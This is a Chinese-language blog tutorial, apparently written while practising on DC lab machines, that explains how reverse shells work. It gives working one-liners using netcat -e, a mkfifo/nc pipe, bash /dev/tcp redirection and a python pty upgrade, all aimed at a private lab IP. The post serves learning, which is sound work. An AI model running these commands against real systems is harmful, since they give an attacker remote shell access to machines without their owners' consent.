





<!doctype html>
<html lang="en">

<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>
<script type="text/javascript" 
src="//cdnjs.cloudflare.com/ajax/libs/prettify/r298/prettify.min.js">
</script>
<link href=  "/plugins/code-theme/tomorrow.css" type="text/css" rel="stylesheet" />
<link rel="stylesheet" href="/plugins/github-markdown.css">

<head>
  <meta charset="UTF-8" name="viewport" content="width=device-width,initial-scale=1">
  
    
    
      <link rel="stylesheet" href="/css/legend.css">
    
  
<meta name="generator" content="Hexo 4.2.0"></head>

<body id="body-x">
<div id="layout-content">
  <div id="menu-outer-x">
  <div id="menu-inner">
    
    
    <div id="site-title">
      Momax's blog
    </div>
    

     
    <div>
    
      
      <a href="/">首页</a>
      
    
      
      <a href="/archives">归档</a>
      
    
    </div>
  </div>
</div> 
  <div id="content-outer">
    <div id="content-inner">
      
      
  <article class="markdown-body">
    <h2 id="post-title">反弹shell
       
        <div id="post-time" datetime="2021-06-05T13:48:36.757Z">
          2021-06-05
        </div>
      
    </h2>
    <h1 id="反弹shell原理简单理解"><a href="#反弹shell原理简单理解" class="headerlink" title="反弹shell原理简单理解"></a>反弹shell原理简单理解</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近这几天在做那个DC的靶场，一直在用反弹shell，但是仅仅是知道基本的反弹shell，其他的一点也不知道，所以这次就来学习下反弹shell</p>
<h2 id="什么是反弹shell"><a href="#什么是反弹shell" class="headerlink" title="什么是反弹shell"></a>什么是反弹shell</h2><p>使用Google hack语法搜索了一下，发现了很多的讲反弹shell的文章，但是具体讲反弹shell原理的并没有几个。<br>反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。</p>
<h2 id="为什么要用反弹shell"><a href="#为什么要用反弹shell" class="headerlink" title="为什么要用反弹shell"></a>为什么要用反弹shell</h2><p>反弹shell通常用于被控端因防火墙，权限不足，端口被占用等的情况<br>举例：假设你现在进入了一个机器的端口，现在该做的就是从本机连接攻击端，这是最常见的攻击方式。远程桌面，web服务，ssh，telnet等等，都是正向连接。<br>但是现在问题来了：<br>被控端的IP是动态改变的，无法进行持续的控制<br>被控端在局域网内，这样就导致你种的马无法进行连接<br>被控端防火墙受限，只能发送请求不能接收你的请求。<br>这时，选择利用反弹shell才是上策。因此，反弹shell的方式就是被控端给攻击端发送请求建立连接的一种方式</p>
<h2 id="反弹shell的常见利用方式"><a href="#反弹shell的常见利用方式" class="headerlink" title="反弹shell的常见利用方式"></a>反弹shell的常见利用方式</h2><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><pre><code class="javascript">攻击机：kali linux：192.168.2.130
被控机：centos：192.168.2.139</code></pre>
<h3 id="开始"><a href="#开始" class="headerlink" title="开始"></a>开始</h3><p>攻击机监听端口：</p>
<pre><code class="javascript">nc -nlvp 4444</code></pre>
<p>被控机执行：</p>
<pre><code class="javascript">nc -e /bin/bash 192.168.2.130 4444</code></pre>
<p>执行效果<br><img src="https://gitee.com/momaxx/photos/raw/master/image1/1.png" alt="enter description here"><br>之后可以利用python打开交互式界面</p>
<pre><code class="python">python -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;</code></pre>
<p><img src="https://gitee.com/momaxx/photos/raw/master/image1/2.png" alt="enter description here"><br>得到交互式界面。之后就可以进行提权等的一系列操作。</p>
<h3 id="命令说明"><a href="#命令说明" class="headerlink" title="命令说明"></a>命令说明</h3><p>在上面用到的命令<code>nc -e /bin/bash 192.168.2.130 4444</code>实现了反弹shell。</p>
<pre><code class="bash">nc #netcat简称，目前基本上所有的Linux都适配了这个工具，可实现任意TCP/UDP端口的侦听。
参数：-n 不反向解析dns，即不通过IP解析域名
           -v 详细信息输出
           -l 监听
           -p 指定端口
           -e 程序重定向</code></pre>
<pre><code class="bash">/bin/bash #由GNU开发的Shell，主要目标是与POSIX标准保持一致，同时兼顾对sh的兼容，bash从csh和ksh借鉴了很多功能，是各种Linux发行版标准配置的Shell，在Linux系统上/bin/sh往往是指向/bin/bash的符号链接。此外还有其他的shell，如：sh、zsh等</code></pre>
<p>所以上面的命令就是使用<code>netcat</code>将<code>shell</code>发送给指定的IP执行。<br>但是对于有些nc版本并没有-e参数，这样要如何实现呢？</p>
<pre><code class="bash">攻击机：nc -nlvp 4444
被控端： mknod [filename] p;nc [攻击机IP] [攻击机端口] 0&lt;[filename] | /bin/sh 1&gt;[filename]</code></pre>
<p>效果<br><img src="https://gitee.com/momaxx/photos/raw/master/image1/3.png" alt="enter description here"></p>
<p><img src="https://gitee.com/momaxx/photos/raw/master/image1/4.png" alt="enter description here"><br>解释(个人简单理解)：<br>mknod命令创建了一个管道，然后通过nc命令将内容输入到管道文件中，然后传递给/bin/sh，sh会将管道文件的命令执行并将标准输出传到该管道，形成了一个回路。<br>类似命令：</p>
<pre><code class="bash">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc [ip] [port] &gt;/tmp/f</code></pre>
<p>上面说的是利用netcat进行的反弹方式，下面介绍一下最常见的bash利用方法。</p>
<pre><code class="bash">bash -i &gt;&amp; /dev/tcp/192.168.2.130/4444 0&gt;&amp;1</code></pre>
<p>简单解释：</p>
<pre><code class="bash">bash -i：
    bsh前面说了，是Linux中比较常见的一个shell
    -i 这个参数表示的是产生交互式的shell
/dev/tcp/ip/port：
    这个文件是一个特殊的设备文件你如果去访问是无法访问到的
</code></pre>
<p>对于一个文件，Linux中分为七种：</p>
<table>
<thead>
<tr>
<th>文件标识类型</th>
<th>文件类型</th>
</tr>
</thead>
<tbody><tr>
<td>-</td>
<td>普通文件</td>
</tr>
<tr>
<td>d</td>
<td>目录</td>
</tr>
<tr>
<td>l</td>
<td>符号链接</td>
</tr>
<tr>
<td>s</td>
<td>套接字</td>
</tr>
<tr>
<td>b</td>
<td>块设备</td>
</tr>
<tr>
<td>c</td>
<td>字符设备</td>
</tr>
<tr>
<td>p</td>
<td>管道</td>
</tr>
</tbody></table>
<p><img src="https://gitee.com/momaxx/photos/raw/master/image1/5.png" alt="enter description here"><br><img src="https://gitee.com/momaxx/photos/raw/master/image1/6.png" alt="enter description here"><br>虽然说这个文件并不存在但是如果在监听情况下对这个文件进行读写，就能实现反弹shell的效果。<br>而对于这个经典的反弹shell，其实可以拆分一下，这样子更加方便理解</p>
<pre><code class="bash">bash -i &gt; /dev/tcp/ip/port
bash -i &lt; /dev/tcp/ip/port
</code></pre>
<p>理解起来很简单<br>第一个命令，将输入的指令标准输入到攻击机上面，因此这样子的话，在被控端输入的任何指令都无法得到回显。<br><img src="https://gitee.com/momaxx/photos/raw/master/image1/7.png" alt="enter description here"><br>图片中上被控端输入的话得不到任何的回显。但是这样子话，我们好像并没有得到想要的效果，所以就有了第二个命令<br>对于第二个命令，意思就是将输入的命令传给被控端的bash，这样子自然就能执行了</p>
<p><img src="https://gitee.com/momaxx/photos/raw/master/image1/8.png" alt="enter description here"><br>现在，这两个命令结合一下，得到</p>
<pre><code class="bash">bash -i &gt; /dev/tcp/ip/port 0&gt;&amp;1</code></pre>
<p>但是这样的话所有在攻击机执行的命令都会在被控端得到回显<br><img src="https://gitee.com/momaxx/photos/raw/master/image1/9.png" alt="enter description here"><br><img src="https://gitee.com/momaxx/photos/raw/master/image1/10.png" alt="enter description here"><br>这样子又会让被控端知道你在干什么，所以要进行改良，就得到了最开始给的那个经典的反弹shell<br>执行之后<br><img src="https://gitee.com/momaxx/photos/raw/master/image1/11.png" alt="enter description here"><br><img src="https://gitee.com/momaxx/photos/raw/master/image1/12.png" alt="enter description here"><br>得不到回显<br>同样有类似的相同功能的命令</p>
<pre><code class="bash">bash -i &gt; /dev/tcp/ip/port 0&gt;&amp;1 2&gt;&amp;1</code></pre>
<p>对于这些符号，网上有很多的师傅们都总结过用法以及意思，就不进行总结，这里给一下我看到的一个<a href="https://xz.aliyun.com/t/2548" target="_blank" rel="noopener">师傅的文章</a>写的相关内容</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>对于反弹shell的方法有很多，网络上面有各种各样的形式的反弹shell，但是用起来原理都是一样的，看到有很多形式的反弹shell，就是只有形式不给原理，就想学习一下原理是什么，文中可能因为水平有限解释的不到位，还请海涵。</p>

  </article>

  
    
    
      <div id="page-prev-next">
        
        
          <a id="page-prev-a" href="/2021/08/08/volatility%E5%8F%82%E6%95%B0%E8%AF%B4%E6%98%8E/"> ← volatility使用 </a>
        

        
        
          <a id="page-next-a" href="/2021/01/22/work/"> work → </a>
        
      </div>
    
    
    
    

    
    

  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div id="reward_comment">文章对我有帮助，打赏作者</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechatpay.png" alt="moMaxX WeChat Pay"/>
          <p>微信</p>
        </div>
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/alipay.png" alt="moMaxX Alipay"/>
          <p>支付宝</p>
        </div> 
      
    </div>
  </div>


  

    </div>
  </div>
</div>



<div id="bottom-outer">
  
  <div id="bottom-inner">
    moMaxX 
    ©2021 |Powered by  
    <a href="http://hexo.io" target="_blank">Hexo</a> with theme 
    <a href="https://github.com/iHongRen/legend" target="_blank">legend</a>
  </div>
    
    
    
      <a href="/atom.xml">
      
      <img src=/images/rss.png height="18" width="18">
      
</div> 


  
  
    <script src="/js/legend.js"></script>
  


</body>
</html>


<script>
$(window).on('load', function(){
   $('pre').addClass('prettyprint').attr('style', 'overflow:auto;');
   prettyPrint();
 });
</script>

